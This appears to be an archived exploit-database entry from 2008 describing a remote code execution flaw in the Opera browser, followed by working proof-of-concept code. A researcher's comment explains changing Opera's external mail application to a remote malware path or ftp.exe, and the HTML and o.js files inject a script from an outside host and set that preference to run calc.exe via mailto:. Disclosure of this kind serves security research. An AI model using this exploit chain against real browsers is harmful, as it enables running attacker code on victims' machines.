<!-- Just found a way to use Stefano’s opera:config idea to execute code from remote. Instead of changing the HTTP Proxy, an attacker can change the default external mail application to “\\evil\malware.exe â€, or to local commands (e.g. ftp.exe which can be used to download malicious binaries from remote). Also, there is a need to change the “Mail Handler†settings to “2â€, so opera will execute the external mail application, instead of the default opera mail application. After changing the settings, the attacker can simply set the location to “mailto:†to execute the code. A proof-of-concept which executes the Windows Calculator can be found here: http://raffon.net/research/opera/history/op.html Cheers, --Aviv. http://aviv.raffon.net --> <html> <title>bb</title> <script> var z=null; function x() { window.setTimeout("z=window.open('opera:historysearch?q=%2A');window.focus();",1500); window.setTimeout("z.close();",3000); window.setTimeout("location.href='mailto:'",3000); } </script> <body> <a href="#<script src='http://www.raffon.net/research/opera/history/o.js'></script>" onclick="x()">Click me...</a> </body> </html> <o.js> s=document.createElement("IFRAME"); s.src="opera:config"; document.body.appendChild(s); s.src="javascript:opera.setPreference('Mail','External Application','c:\\\\windows\\\\system32\\\\calc.exe');opera.setPreference('Mail','Handler','2');parent.window.close()"; </o.js> # milw0rm.com [2008-10-23]